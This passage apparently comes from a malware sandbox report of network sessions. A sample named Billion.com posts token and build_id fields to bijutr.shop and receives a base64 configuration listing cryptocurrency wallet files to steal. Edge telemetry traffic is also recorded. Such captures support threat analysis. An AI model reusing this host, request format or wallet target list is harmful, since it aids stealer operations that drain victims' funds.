                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:39 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:46 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        42192.168.2.650071188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:41 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----M79RQ1VS0ZU3EUASJMGV
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:41 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4d 37 39 52 51 31 56 53 30 5a 55 33 45 55 41 53 4a 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 39 36 35 34 63 33 62 63 63 37 33 33 30 65 31 39 35 34 63 61 66 64 33 34 35 34 65 63 34 34 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 39 52 51 31 56 53 30 5a 55 33 45 55 41 53 4a 4d 47 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4d 37 39 52 51 31 56 53 30 5a 55 33 45 55 41 53 4a 4d 47 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                        Data Ascii: ------M79RQ1VS0ZU3EUASJMGVContent-Disposition: form-data; name="token"259654c3bcc7330e1954cafd3454ec44------M79RQ1VS0ZU3EUASJMGVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------M79RQ1VS0ZU3EUASJMGVCont
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:41 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                                        Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        43192.168.2.65007420.189.173.24437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064920167&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 11902
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC11902OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 38 3a 32 38 3a 34 30 2e 31 36 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 32 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 34 38 64 30 61 64 2d 39 65 62 30 2d 34 64 66 33 2d 62 63 36 62 2d 35 63 31 32 33 31 64 39 32 33 62 39 22 2c 22 65 70 6f 63 68 22 3a 22 33 36 30 31 37 35 39 37 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-24T18:28:40.165Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=5556440dd7f446ce8b2fb9e151d9af20&HASH=5556&LV=202412&V=4&LU=1735064923209; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=140aea28f98b4297838400d2f698d2c2; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 3042
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        44192.168.2.65007520.189.173.24437060C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC1071OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735064920176&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 33279
                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                        Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                        Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                        Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                        Cookie: USRLOC=; MUID=302665E99E416E3C182470B69FCB6F6B; _EDGE_S=F=1&SID=0DE3EBFAB5BE6BFF1F65FEA5B4FF6AFE; _EDGE_V=1; _C_ETH=1; msnup=%7B%22cnex%22%3A%22no%22%7D
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC16384OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 4c 6f 61 64 54 69 6d 65 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 34 54 31 38 3a 32 38 3a 34 30 2e 31 37 34 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 33 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 65 66 34 38 64 30 61 64 2d 39 65 62 30 2d 34 64 66 33 2d 62 63 36 62 2d 35 63 31 32 33 31 64 39 32 33 62 39 22 2c 22 65 70 6f 63 68 22 3a 22 33 36 30 31 37 35 39 37 30 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                        Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-24T18:28:40.174Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"ef48d0ad-9eb0-4df3-bc6b-5c1231d923b9","epoch":"3601759707"},"app":{"locale
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC16384OUTData Raw: 53 74 61 74 69 63 22 3a 66 61 6c 73 65 2c 22 6e 61 6d 65 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 6f 63 69 64 22 3a 22 6d 73 65 64 67 64 68 70 22 2c 22 70 72 6f 64 75 63 74 22 3a 22 61 6e 61 68 65 69 6d 22 2c 22 74 79 70 65 22 3a 22 64 68 70 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 65 64 67 65 2f 6e 74 70 3f 6c 6f 63 61 6c 65 3d 65 6e 2d 47 42 26 74 69 74 6c 65 3d 4e 65 77 25 32 30 74 61 62 26 64 73 70 3d 31 26 73 70 3d 42 69 6e 67 26 69 73 46 52 45 4d 6f 64 61 6c 42 61 63 6b 67 72 6f 75 6e 64 3d 31 26 73 74 61 72 74 70 61 67 65 3d 31 26 50 43 3d 55 35 33 31 26 6f 63 69 64 3d 6d 73 65 64 67 64 68 70 22 2c 22 76 69 65 77 54 79 70 65 22 3a 22 73 69 7a 65 33 63 6f 6c 75 6d 6e 22 2c 22 74 68 65 6d 65 22 3a 22 6c 69
                                                                                                                                                                                                                                                                                                        Data Ascii: Static":false,"name":"default","ocid":"msedgdhp","product":"anaheim","type":"dhp","url":"https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531&ocid=msedgdhp","viewType":"size3column","theme":"li
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:42 UTC511OUTData Raw: 6e 5d 2f 73 74 61 74 69 63 73 62 2f 73 74 61 74 69 63 73 2f 6c 61 74 65 73 74 2f 62 72 61 6e 64 2f 6e 65 77 2d 6d 73 6e 2d 6c 6f 67 6f 2d 63 6f 6c 6f 72 2d 62 6c 61 63 6b 2e 73 76 67 22 3a 7b 22 74 79 70 65 22 3a 22 6f 22 2c 22 73 70 61 6e 73 22 3a 7b 22 6e 65 74 77 6f 72 6b 22 3a 5b 31 37 30 36 31 2c 33 35 30 5d 7d 2c 22 64 75 72 61 74 69 6f 6e 73 22 3a 7b 22 63 6f 6e 6e 65 63 74 22 3a 31 33 2c 22 72 65 71 75 65 73 74 22 3a 33 33 37 2c 22 63 64 6e 54 43 50 22 3a 33 31 36 2c 22 63 64 6e 53 65 6c 66 22 3a 30 2c 22 63 64 6e 4f 72 69 67 69 6e 22 3a 30 7d 2c 22 73 63 61 6c 61 72 73 22 3a 7b 22 73 69 7a 65 22 3a 32 30 37 30 2c 22 63 61 63 68 65 22 3a 30 7d 7d 2c 22 5b 63 64 6e 5d 2f 73 74 61 74 69 63 73 62 2f 73 74 61 74 69 63 73 2f 6c 61 74 65 73 74 2f 69 63
                                                                                                                                                                                                                                                                                                        Data Ascii: n]/staticsb/statics/latest/brand/new-msn-logo-color-black.svg":{"type":"o","spans":{"network":[17061,350]},"durations":{"connect":13,"request":337,"cdnTCP":316,"cdnSelf":0,"cdnOrigin":0},"scalars":{"size":2070,"cache":0}},"[cdn]/staticsb/statics/latest/ic
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                        Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                        P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                        Set-Cookie: MC1=GUID=60195b9e993d46eb8c10cac2c472a656&HASH=6019&LV=202412&V=4&LU=1735064923059; Domain=.microsoft.com; Expires=Wed, 24 Dec 2025 18:28:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        Set-Cookie: MS0=cf7be54bb40d4fafafa79dd0a9085ce4; Domain=.microsoft.com; Expires=Tue, 24 Dec 2024 18:58:43 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                        time-delta-millis: 2883
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                        Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                        Date: Tue, 24 Dec 2024 18:28:42 GMT
                                                                                                                                                                                                                                                                                                        Connection: close


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        45192.168.2.650080188.245.216.2054431396C:\Users\user\AppData\Local\Temp\680662\Billion.com
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-24 18:28:43 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----RQ9ZCBA1N7QQQI5XT0H4
                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                        Host: bijutr.shop
                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
